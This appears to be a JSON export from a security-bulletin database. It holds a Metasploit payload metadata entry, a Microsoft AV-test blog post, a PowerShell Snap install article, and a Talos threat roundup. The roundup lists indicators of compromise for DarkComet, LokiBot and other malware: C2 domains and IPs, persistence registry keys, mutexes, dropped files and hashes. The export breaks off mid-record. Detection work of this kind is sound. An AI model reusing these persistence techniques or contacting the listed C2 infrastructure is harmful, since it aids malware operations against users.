{"published": "1976-01-01T00:00:00", "type": "metasploit", "sourceData": "", "references": [], "modified": "1976-01-01T00:00:00", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "enchantments": {"vulnersScore": 5.0}, "_object_type": "robots.models.metasploit.MetasploitBulletin", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "metasploitHistory": "", "metasploitReliability": "Normal", "enchantments_done": [], "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "viewCount": 5, "lastseen": "2017-08-21T15:33:14", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [{"edition": 1, "bulletin": {"published": "1976-01-01T00:00:00", "type": "metasploit", "bulletinFamily": "exploit", "reporter": "Rapid7", "title": "Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)", "references": [], "modified": "1976-01-01T00:00:00", "description": "Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)", "enchantments": {}, "viewCount": 5, "lastseen": "2017-07-02T23:45:12", "id": "MSF:PAYLOAD/WINDOWS/PATCHUPDLLINJECT/BIND_IPV6_TCP_UUID", "sourceHref": "", "cvelist": [], "objectVersion": "1.4", "history": [], "metasploitReliability": "Normal", "href": "https://www.rapid7.com/db/modules/payload/windows/patchupdllinject/bind_ipv6_tcp_uuid", "cvss": {"score": 0.0, "vector": "NONE"}, "metasploitHistory": "", "sourceData": ""}, "differentElements": ["href"], "lastseen": "2017-07-02T23:45:12"}], "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}

{"result": {"mssecure": [{"lastseen": "2018-07-20T19:40:06", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "In a previous post, in the spirit of our [commitment to delivering industry-leading protection, customer choice, and transparency on the quality of our solutions](<https://cloudblogs.microsoft.com/microsoftsecure/2018/05/24/adding-transparency-and-context-into-industry-av-test-results/>), we shared insights and context into the results of AV-TESTs January-February 2018 test cycle. We released a transparency report to help our customers and the broader security community to stay informed and understand independent test results better.\n\nIn the continued spirit of these principles, wed like to share [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>)s scores in the March-April 2018 test. In this new iteration of the transparency report, we continue to investigate the relationship of independent test results and the real-world protection of antivirus solutions. We hope that you find the report insightful.\n\n### [**Download the complete transparency report on March-April 2018 AV-TEST results**](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2ouJA>)\n\n \n\nBelow is a summary of the transparency report:\n\n | **Protection**: Windows Defender AV achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680 malware samples (0.035% miss rate). With the latest results, Windows Defender AV has achieved 100% on 9 of the 12 most recent tests (combined \"Real World\" and \"Prevalent malware\"). \n---|--- \n | **Usability (false positives)**:Windows Defender AV maintained its previous score of 5.5/6.0. Based on telemetry, most samples that Windows Defender AV incorrectly classified as malware (false positive) had very low prevalence and are not commonly used in business context. This means that it is unlikely for these false positives to affect enterprise customers. \n | **Performance**: Windows Defender AV maintained its previous score of 5.5/6.0 and continued to outperform the industry in most areas. These results reflect the investments we made in optimizing Windows Defender AV performance for high-frequency actions. \n \n \n\nThe report aims to help customers evaluate the extent to which test results are reflective of the quality of protection in the real world. At the same time, insights from the report continue to drive further improvements in the intelligent security services that Microsoft provides for customers.\n\n[Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender?ocid=cx-blog-mmpc>) and the rest of the built-in security technologies in Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)) work together to create a unified endpoint security platform. In real customer environments, this unified security platform provides intelligent protection, detection, investigation, and response capabilities that are not currently reflected in independent tests. We tested the two malware samples that Windows Defender AV missed in the March-April 2018 test and proved that for both missed samples, at least three other components of Windows Defender ATP would detect or block the malware in a true attack scenario. You can find these details and more in the transparency report.\n\n### [**Download the complete transparency report on March-April 2018 AV-TEST results**](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2ouJA>)\n\n \n\nThe [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>) security platform incorporates attack surface reduction, next-generation protection, endpoint detection and response, and advanced hunting capabilities. To see these capabilities for yourself, **[sign up for a 90-day trial of Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)**, or [enable Preview features](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-atp/preview-settings-windows-defender-advanced-threat-protection>) on existing tenants.\n\n \n\n \n\n \n\n**_Zaid Arafeh_**\n\n_Senior Program Manager, Windows Defender Research team_\n\n \n\n \n\n[](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc>)\n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>) and [Windows Defender Security Intelligence](<https://www.microsoft.com/en-us/wdsi>).\n\nFollow us on Twitter [@WDSecurity](<https://twitter.com/WDSecurity>) and Facebook [Windows Defender Security Intelligence](<https://www.facebook.com/MsftWDSI/>).", "reporter": "Windows Defender ATP", "published": "2018-07-20T19:30:38", "type": "mssecure", "title": "March-April 2018 test results: More insights into industry AV tests", "enchantments": {"score": {"modified": "2018-07-20T19:40:06", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-07-20T19:30:38", "id": "MSSECURE:3E680F4639CBCAD08E28CAD37FC9AB15", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/20/march-april-2018-test-results-more-insights-into-industry-av-tests/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2018-07-20T21:11:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.thn.ThnBulletin"], "references": [], "description": "[](<https://1.bp.blogspot.com/-n6Pkkp3-JBQ/W1I0v4RLakI/AAAAAAAAxmQ/51ArjMeuZTsDJ5a7r0YrLB-YZrtEZDOMACLcBGAs/s728-e100/microsoft-powershell-core-linux-min.jpg>)\n\nMicrosoft's love for Linux continues\u2026 \n \nMicrosoft has released its command-line shell and scripting language PowerShell Core for Linux operating system as a Snap package, making it easier for Linux users to install Microsoft PowerShell on their system. \n \nYes, you heard me right. \n \nMicrosoft has made **PowerShell Core** available to the [Ubuntu Snap Store](<https://snapcraft.io/powershell-preview>) as a Snap application. \n \nPowerShell Core is a cross-platform version of Windows PowerShell that is already available for Windows, macOS, and Linux OS and has been designed for sysadmins who manage assets in hybrid clouds and heterogeneous environments. \n\n\n \n**Snap** is a universal Linux packaging system, built by Canonical for the Ubuntu operating system, which makes an application compatible for all major Linux distributions without requiring any modification. \n \nA Snap package is basically an application compressed together with its dependencies and also includes instructions on how to run and interact with other software on various Linux systems. \n\n\n> \"Snaps are great because they provide a single package format that works across many Linux distributions, much like how PowerShell acts as a single automation platform across operating systems,\" [explains](<https://snapcraft.io/blog/powershell-launches-as-a-snap>) Joey Aiello, Program Manager of PowerShell at Microsoft.\n\n> \"We hope our users enjoy the simplified installation and update experience of Snaps as much as we do.\"\n\n> \"PowerShell Core from Microsoft is now available for Linux as a Snap. Built on the .NET Framework, PowerShell is an open source task-based command-line shell and scripting language with the goal of being the ubiquitous language for managing hybrid cloud assets,\" says Canonical.\n\n> \"It is designed specifically for system administrators and power-users to rapidly automate the administration of multiple operating systems and the processes related to the applications that run on those operating systems.\"\n\n \n\n\n## How to Install PowerShell Core on Linux\n\n \nTo install Microsoft PowerShell Core as a snap package on a Linux-based OS, you first need to install snapd and then run the following command. \n\n\n> snap install powershell --classic \n\nOnce installed, open a terminal and run the command pwsh. \n \nAlternatively, you can directly head on to this [web page](<https://snapcraft.io/powershell>), and install PowerShell Core snap app on your system. \n\n\n \nIf you want to try out beta software, you also can install the official preview/beta version of PowerShell found here, or run the below command from the terminal. \n \n\n\n> snap install powershell-preview --classic\n\n \nThe arrival of PowerShell Core on the Snap store is definitely a big deal. \n \nEarlier this year, Microsoft even released a [Skype Snap app](<https://snapcraft.io/skype>). All these are a continued sign of Microsoft\u2019s support for open source community. \n \nAnd one should not forget, [Microsoft now owns GitHub](<https://thehackernews.com/2018/06/microsoft-acquires-github.html>)! \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "reporter": "The Hacker News", "published": "2018-07-20T19:27:00", "type": "thn", "title": "Microsoft Releases PowerShell Core for Linux as a Snap Package", "enchantments": {"score": {"modified": "2018-07-20T21:11:01", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-07-20T19:27:46", "id": "THN:CCFD967EEC07D85067D0977D235757E8", "href": "https://thehackernews.com/2018/07/powershell-core-linux-snap.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-07-20T20:44:37", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "[](<https://2.bp.blogspot.com/-FgblYJQPby0/W0i0sXWWevI/AAAAAAAAAfs/ApaO27JGqoYJ4uzKktEz-GhLWT9JbidAQCLcBGAs/s1600/threat_roundup_logo_v2%2B%25281%2529.png>)\n\n \nToday, as we do every week, Talos is giving you a glimpse into the most prevalent threats we've observed this week \u2014 covering the dates between July 13 and 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, we will summarize the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats. \n \nAs a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net. \n \nThe most prevalent threats highlighted in this roundup are: \n \n\n\n * **Win.Trojan.Generickdv** \nTrojan \nThese DarkComet-related samples install a mwalre that is persistent and provides backdoor access and logging on the infected system. \n \n * **Doc.Malware.Valyria-6615927-0** \nMalware \nThis is a Microsoft Office macro-based file dropper. \n \n * **Win.Packed.Razy-6615989-0** \nPacked \nRazy is oftentimes a generic detection name for a Windows trojan. These samples attempts to spread via USB infection with .lnk shortcut files. They collect sensitive information from the infected host, format and encrypt the data, and send it to a command and control (C2) server. Information collected includes screenshots and the sample installs for auto execution. It uses the pattern %AppData%\\&lt;company name&gt;\\&lt;company name&gt;.exe \n \n * **Win.Trojan.Darkkomet-6615953-0** \nTrojan \nDarkkomet, or DarkComet, is a freeware remote access trojan that was released by an independent software developer. It provides the same functionality you would expect from a remote access tool such as keylogging, webcam access, microphone access, remote desktop, URL download an program execution, among others. https://blog.talosintelligence.com/2015/07/ding-your-rat-has-been-delivered.html https://blog.talosintelligence.com/2014/11/reversing-multilayer-net-malware.html \n \n * **Win.Malware.Gamarue-6615948-0** \nMalware \nThese files collect credentials from Windows and from browsers. They connect to C2 known to be associated with LokiBot. \n \n\n* * *\n\n## Threats\n\n### Win.Trojan.Generickdv\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * &lt;HKCU&gt;\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: internat.exe\n * &lt;HKLM&gt;\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: HKLM\n * &lt;HKCU&gt;\\SOFTWARE\\v\u00edtima \n**Mutexes** \n\n\n * _x_X_BLOCKMOUSE_X_x_\n * _x_X_PASSWORDLIST_X_x_\n * kingofthedead_PERSIST\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * N/A\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\XX--XX--XX.txt\n * %LocalAppData%\\Temp\\XxX.xXx\n * %AppData%\\logs.dat\n * %SystemDrive%\\dir\\instal\\win32\\svchost.exe\n**File Hashes** \n\n\n * 8c87d29fc3fae2fa8f5056a2c02686c901cd79cc4529bf5a29ae08042aaab746\n * c2fba20c7753baf7616eddbf784f4f4ff67891b0e578c0209e264a4a477cb6cf\n * c857b44b7591ede89b6bf8899aacf155f15cf92c95af494a0f8d3df202124f73\n * ddab332853644fd0d13c87f93c1a05caa1de7396c7da03650b2de1a812b6f156\n * e85321b89e3f28bfca8049e0a25f819c8e9897db956056df3b8e65f825d898db\n \n\n\n#### Coverage\n\n[](<https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://1.bp.blogspot.com/-7yvmM5e23vw/W1IoM5Iy1PI/AAAAAAAAAmo/ptElm45KISMHsMi1HG_jZQ2ruYoMePnYQCLcBGAs/s1600/ddab332853644fd0d13c87f93c1a05caa1de7396c7da03650b2de1a812b6f156_amp.png>)\n\n** \n** \n**ThreatGrid** \n\n\n[](<https://4.bp.blogspot.com/-4uxdX4QBYeE/W1In-eFNoHI/AAAAAAAAAmk/ILKXdXKBOMYgSyO86SOVMiBJm092z7e_wCLcBGAs/s1600/8c87d29fc3fae2fa8f5056a2c02686c901cd79cc4529bf5a29ae08042aaab746_tg.png>)\n\n** \n** \n\n\n### Doc.Malware.Valyria-6615927-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * N/A\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * N/A\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\320.exe\n * %LocalAppData%\\Temp\\es1uuzqu.xfn.ps1\n**File Hashes** \n\n\n * 00592b51236463fc3e8b7d530a555e55dc46eaf0d741f2c6a06bf1016a8fe6ca\n * 04f46cc8eea2154477cdfc3b893ae9f625e662cd401c3bd172dd9943e92032d4\n * 053363bf7d81a002ab526c913be41803c7eadfa958fc1e94a28f440c9707ce6c\n * 060f8741f10f260d0103a93b3242235fbbcaee823259d86b5eb6ff339b8c23d8\n * 1440592b86f68fb240ec526a026f10b2db953f5ea946280aabf2e97ee1022211\n * 167de913f71eff1ac2aa1e1d1ecb60ae113d2b47cc6848584235d6f76c17f2c4\n * 1b35d8b84c971ec3563ee2021b26e318f199894228831ca9749196000679c8d3\n * 25d000f24e86937a202b12dcce7edfdacd42dbb967c76829eb94d5965590e5c1\n * 2ab506076a0f2bd1b3971285b5b90b859dec3ad1e2ff0a0b117824ca16c55cab\n * 3708636d74732da211c6a27d4919e81bf092deecbe3127cafabada1825756d34\n * 471d40b6df9e40c64f49eb73903840a6d01a6a5a8df5350a89312c6355fc5f28\n * 4d5ce5b8a4729716cadf818b0eeaaa94694147d72377b2618a0832d6878cba51\n * 523986d86f1d157dc7c0ee71fef4b7db3d603cfc8290ec8e477d530825421709\n * 559bad49d16cf86b0904f0413fe987fde19cebf88c5f8cf343c0fd5fc029c668\n * 5836e5d29581870a533010f4e83ff5a5241b253330fc058c5610004e874b0f4e\n * 660d4a7fbb3a9b2cda39dd9cf070b23487a150d7eaac569d1dcd5e658b5b3e73\n * 759f6aa2a7105f84a4857ea959402c348719c920adede9f1b525b926f680619f\n * 84db21d753f64d64f83c378ba344e19600d1467543a22a64af790407179208c3\n * 85027897d5c0608e88483ae483079d16dc3851e746b6ae18f8cf335c10334f5a\n * 8611f5f17e11d5180cc162509aaf2623196d44d09a80813ce21336f3cb0be4a0\n * 925ca30ebfb42ee1a9dcf7e567397f3a266f70cc6d20158929c905642a94917b\n * 965b382513154b06f1cbfdb0a9214fabeb204954e106af0abc9fe7b279ee3479\n * b658943488d9fd1886d7848cad19322293558eb62648ca60c54083c8e710b710\n * e49851a85e17e21159a43fbbd1bdc1183a95202a86bd328769e2049a9dd9a886\n * e7db2087ef7f0f80640c7f62a493da43eadb8db5f5af90ef1cb55e68a465696a\n \n\n\n#### Coverage\n\n[](<https://2.bp.blogspot.com/-jTB0CZDwsFQ/Wz-6aknWuhI/AAAAAAAAAbc/XPOsdG7hpfQpz9NPUVylIgNETUHICQ5OwCLcBGAs/s320/amp-email-threatgrid-cws-only.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://2.bp.blogspot.com/-w_98V_rSgDY/W1IoeKZZt-I/AAAAAAAAAm0/_gnzObiPYcUMOq1Yvw0unt3rym6ml979gCLcBGAs/s1600/e7db2087ef7f0f80640c7f62a493da43eadb8db5f5af90ef1cb55e68a465696a_amp.png>)\n\n \n**ThreatGrid** \n\n\n[](<https://4.bp.blogspot.com/-tDO0UtrRBzk/W1Io9NpQAcI/AAAAAAAAAnA/88cx6eL-7RkMUhL9cBzB3uD3EtYJthEkgCLcBGAs/s1600/5836e5d29581870a533010f4e83ff5a5241b253330fc058c5610004e874b0f4e_tg.png>)\n\n \n\n\n### Win.Packed.Razy-6615989-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * &lt;HKCU&gt;\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: internat.exe\n * &lt;HKCU&gt;\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: Pactiv Corp\n**Mutexes** \n\n\n * N/A\n**IP Addresses** \n\n\n * 216.146.43.71\n * 148.163.124.20\n**Domain Names** \n\n\n * checkip.dyndns.org\n * www.papgon10.ru\n**Files and or directories created** \n\n\n * %AppData%\\Pactiv Corp\\Pactiv Corp.exe\n * %AppData%\\ScreenShot\\screen.jpeg\n * \\??\\E:\\$RECYCLE .lnk\n * \\??\\E:\\scr.exe\n * \\$RECYCLE .lnk\n * \\scr.exe\n**File Hashes** \n\n\n * 03517ae084fa51e60f9f71ed80993adf8ff104eb44225377b8cd6e7fc3a9d663\n * 0b83306197f922b8a89054be66ecce742b166457c9b22118ec0adf256e1ee6a1\n * 0c2aae41be90b95f45a3845afc90626f995f8ec9b56529f09ac66a7983748abd\n * 0d2c77209a75a0f78e751a07653078e7e2ca6e04830d89389d3b483bb09cd139\n * 0d8d7edc72504fad53c5b46f6d74a37160474356d69418241a47c0fcddc9ac4e\n * 11be51ab233c8b4e6261dd2e336c8b3f404cbd6b4e4c45abc9d3e95751151d3c\n * 1b2f67ba7f479e6bc061dbf5f9ba983963f436a3cc64d99b6a8b5240db165ab0\n * 1d0d2b945f206f3dc068c12b78c57def633b9aba4866ab11afb191264195e33b\n * 1dfce6d161a6ebf19fc77feb10123b721c92125d2b899e51411346986febc71e\n * 1f17c7a22259c8da0510c7b0aff257bf031621ed6745a5b8d60cde153057a91a\n * 1fe7a461de250c6149cecacc7efce60cb6532ac139d426e59a9ca9ac978e9626\n * 234886ab9eed46dbe1751cdaf9e1f0b53637aacb4c81877b44af818efd038c36\n * 23f7178047915b7c2130c0cec7a98675ee4dd02d10491b7966599296d97cc1f9\n * 2a9a5d363e0b7bc059577dfee812927ea3408955d532f40bae2c524d18814f78\n * 2b7ac5ebcbd34434ba3b78849022346ac3e1a20339e7046740439750e3271295\n * 31b695748122457b592bbdba8e832ea16451ed43b41bba88090b91c99b14e565\n * 3cf6b0c34bb13e2532cbcbaa424d0ce06286c02025e2613d0e2e71662705ba75\n * 3fb1cb1530b46c77b60d3225bebcbe33bafba69eb67ee659f1107a68c9c9da5c\n * 407a9edc6ea979673f4f65741c6c7b55387fea59012be25073ec5c9c1993e30e\n * 408eeb5088f25d51e9acc96d5d2d2a41eee87c1e53456065af70c7481fc9427d\n * 41b3ceb6e29b3958032245d78e17100b255d2db8180e11ac3f4efe0e5a609b0c\n * 43d7b9dd5c8441079308aa79cdbd300ae94836f97e6a02d8122e895ebd82f9de\n * 4db761271220b7a4a9469570ab470f3303588b2201c2d5971b27259769d9e06e\n * 5285379abf7be3d20375f077c4e251364a291f5634ad24db59999a187b2bb321\n * 538f1559eeced8c9a3e088b6e700edad0f86919eb790084638e1c051a37272d6\n \n\n\n#### Coverage\n\n[](<https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://4.bp.blogspot.com/-DUByXH-ZAg4/W1IpPKacmhI/AAAAAAAAAnI/qF6W2cJituQlXA5AOdqEmHalyRD62ILpQCLcBGAs/s1600/559237a66a64ddd72b1982b8dfe79f19b7e8bc6e1419de8ffea937dad51c40d9_amp.png>)\n\n** \n** \n**ThreatGrid** \n\n\n[](<https://4.bp.blogspot.com/-WIb3KPOxb18/W1Ipbr6_lwI/AAAAAAAAAnM/BDok_vFaq3EGGAKReJ0wldbkuxT4IPUwwCLcBGAs/s1600/11be51ab233c8b4e6261dd2e336c8b3f404cbd6b4e4c45abc9d3e95751151d3c_tg.png>)\n\n \n**Umbrella** \n\n\n[](<https://4.bp.blogspot.com/-rbI4mKT6xNs/W1Ipkm1BBoI/AAAAAAAAAnU/hzTHzVeFZfUgLjVJB1M5E6_D6oWcYrI8ACLcBGAs/s1600/11be51ab233c8b4e6261dd2e336c8b3f404cbd6b4e4c45abc9d3e95751151d3c_umbrella.png>)\n\n \n\n\n### Win.Trojan.Darkkomet-6615953-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * &lt;HKCU&gt;\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: internat.exe\n * &lt;HKLM&gt;\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\\RUN \n * Value Name: Policies\n * &lt;HKLM&gt;\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \n * Value Name: Avgnt\n * &lt;HKLM&gt;\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\ACTIVE SETUP\\INSTALLED COMPONENTS\\\\{M0VU6C11-0FI1-AFG5-1IVW-7R8T24K13MKV} \n * Value Name: StubPath\n * &lt;HKLM&gt;\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\TRACING\\PLUGUIN_RASAPI32 \n * Value Name: EnableFileTracing\n**Mutexes** \n\n\n * _x_X_BLOCKMOUSE_X_x_\n * _x_X_PASSWORDLIST_X_x_\n * _x_X_UPDATE_X_x_\n * Pluguin\n * Pluguin_PERSIST\n * Pluguin_SAIR\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * novospynet.no-ip.org\n**Files and or directories created** \n\n\n * %LocalAppData%\\Temp\\XX--XX--XX.txt\n * %AppData%\\logs.dat\n * %LocalAppData%\\Temp\\UuU.uUu\n * %WinDir%\\Microsoft\\Pluguin.exe\n**File Hashes** \n\n\n * 02cc0b650b55aeb6be4d18da928a9991b4c3730391979d8f8b67501867aed8e0\n * 072df24ab3e41e1ed93e49429d86b4051903a7975018dafb1edf5af952ade6ec\n * 0883c9976aef73092fa17769b97945eae82f991f07ac681938ab2e16b597b861\n * 115f6b1a6b33e394826c0fdf77b8fdb7087e8737b42fde1cd31e894eda670563\n * 11fb3c84ab7c9122266aa4020454f4110c48992068197ba430c1a7d2086129a3\n * 18e363cd178037c5b6407635d5c61784e0603eded5f0051cbc540ac47d61a8f6\n * 22804ba41fb3ee8ee121af5821df4df5bda36e194e0d8683013dd8e0b1ec71ca\n * 263175c9a3e5d16c3bcd661a56b70786da11e263a02c6f12d2278ec1ebfca0b8\n * 27d3bc3bc2eaa3934c27665feda1b75893148309cf7b19818f58c31db22be625\n * 2e1c2f41704f487779cc6dc4132ee9db933af3a3c9e93692f34e231c4f27d820\n * 3267e3ad1d0518d1ee6510b3e94d7b2f19252e779d08e644738fbb7648181f1d\n * 3d1748d38b40300e81c077df971040a564b81f0c0cbdd299417a7690e48e21a0\n * 3d28e808850728796ca6b96c6cfd94c003e70f12024ac4090c8f68175be61614\n * 4194529ebac0afda1a468befd4534edcc196b737e62ceae1bf02a4c73f8d079b\n * 49b3c5991721fcb0ad9b2e65151c37d35c48fee9558acbb9652265417f06e566\n * 4baeffdf44452fc62f5c9c14f99329a0d44245c14b5f2cddfcb113a8e09a5dcb\n * 4fed4a7ade1fe8c0c3f76788dac4499cb769cd25aaa5556fefb268dbcdfd08be\n * 510bd585e1a49af7ded8a0cc996783a93042cc4492c3e4bbac03befc2f2b8e62\n * 51336b2caef3dd95e9b2c54dd9d9fddeed47fdac5c31163cf2b291446e42f329\n * 53feb1987eba78c921a683a57a75b6a455b7ad3087a7ddc287a33fbdf9c93c9a\n * 5c5112540e79c47806dd35fc65bd351c82dfa6ff97faf0759330191fc54bd52e\n * 63723f92c8c6121e428646c937b40745f4122748d9c949493d28e6b5542feefc\n * 6990bd74cd90afa10eae1867763c2c0d83b88e27ebec7536039bc5567fe241d6\n * 6a0ee362d1d633d42769865e14d2eb776903ebdaea809f08f048e0a79bcf0744\n * 7464f1c4e20b3eb4bf4894a1ae0659e7898f276b48565a55c03b4b3b517c5fcf\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://4.bp.blogspot.com/-DZysUuOxh4s/W1IrOUBDx9I/AAAAAAAAAns/1zFSFAWfsi4rGrNrvmghyGj7PsrxBbzuwCLcBGAs/s1600/51336b2caef3dd95e9b2c54dd9d9fddeed47fdac5c31163cf2b291446e42f329_amp.png>)\n\n \n \n**ThreatGrid** \n\n\n[](<https://2.bp.blogspot.com/-FQhcT66B1lo/W1IrhC1kLnI/AAAAAAAAAn8/s15Bm4Lmv2YnQcGJlzhDFdLk_YWgOoD4wCLcBGAs/s1600/4baeffdf44452fc62f5c9c14f99329a0d44245c14b5f2cddfcb113a8e09a5dcb_tg.png>)\n\n \n \n**Umbrella** \n\n\n[](<https://3.bp.blogspot.com/-WCwaDHxxVA8/W1IrlxyiCbI/AAAAAAAAAoA/OOKsTpNWxGkDY0m_HgOvyzFttBroJJZ9wCLcBGAs/s1600/4baeffdf44452fc62f5c9c14f99329a0d44245c14b5f2cddfcb113a8e09a5dcb_umbrella.png>)\n\n \n\n\n### Win.Malware.Gamarue-6615948-0\n\n \n\n\n#### Indicators of Compromise\n\n \n**Registry Keys** \n\n\n * N/A\n**Mutexes** \n\n\n * 3749282D282E1E80C56CAE5A\n**IP Addresses** \n\n\n * N/A\n**Domain Names** \n\n\n * ongertelles.com\n**Files and or directories created** \n\n\n * %AppData%\\D282E1\n * %AppData%\\D282E1\\1E80C5.lck\n * %AllUsersProfile%\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\Policy.vpol\n * %LocalAppData%\\Microsoft\\Vault\\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\\Policy.vpol\n * \\PC*\\MAILSLOT\\NET\\NETLOGON\n**File Hashes** \n\n\n * 12f9752a1b9a35d5c8caecc5c8d0a443bf54aad5470bd7d00ee75fc018a39cdf\n * 1e4d5ed6676259a1664729528025d741638c7294a7bf4145559893e004933ee2\n * 6532e8315e7fd4a5e82bba7971f4c434e3c3c417dba41fee512fa51245686fd1\n * bff1dbf4c514881537694fd27bf3baac1bc52c5a6c617b5d28b526e0ecd62aee\n * c79e2c39343f78b05a45509bd8e407e9c7ea92456905b4d392a1a425d3dfce11\n * d180cd252c0d7574a0805a8c2bb3f4a9ca6b0a85ef8d46a0b3941e6ce8b514a4\n \n\n\n#### Coverage\n\n[](<https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png>)\n\n \n\n\n#### Screenshots of Detection\n\n**AMP** \n\n\n[](<https://3.bp.blogspot.com/-ATudu181spE/W1IrvGqvRTI/AAAAAAAAAoE/Eha9xHGUhL0e4PeQHTuix6M19Bgf6sCiACLcBGAs/s1600/c79e2c39343f78b05a45509bd8e407e9c7ea92456905b4d392a1a425d3dfce11_amp.png>)\n\n \n \n**ThreatGrid** \n** \n** \n\n\n[](<https://2.bp.blogspot.com/-hLGzNFqPnGE/W1IsFNECP9I/AAAAAAAAAoQ/ey6Wr0B58wcerLoNC8tiO_JZ22iHF_eXQCLcBGAs/s1600/bff1dbf4c514881537694fd27bf3baac1bc52c5a6c617b5d28b526e0ecd62aee_tg.png>)\n\n \n \n**Umbrella** \n \n\n\n[](<https://3.bp.blogspot.com/-GONv87Xkf2E/W1IsV9LI1uI/AAAAAAAAAoY/YeXJbTVRPzweLeaRHB9zxbUOEDnVnHafwCLcBGAs/s1600/bff1dbf4c514881537694fd27bf3baac1bc52c5a6c617b5d28b526e0ecd62aee_umbrella.png>)\n\n \n", "reporter": "noreply@blogger.com (William Largent)", "published": "2018-07-20T12:27:00", "type": "talosblog", "title": "Threat Roundup for July 13-20", "enchantments": {"score": {"modified": "2018-07-20T20:44:37", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "blog", 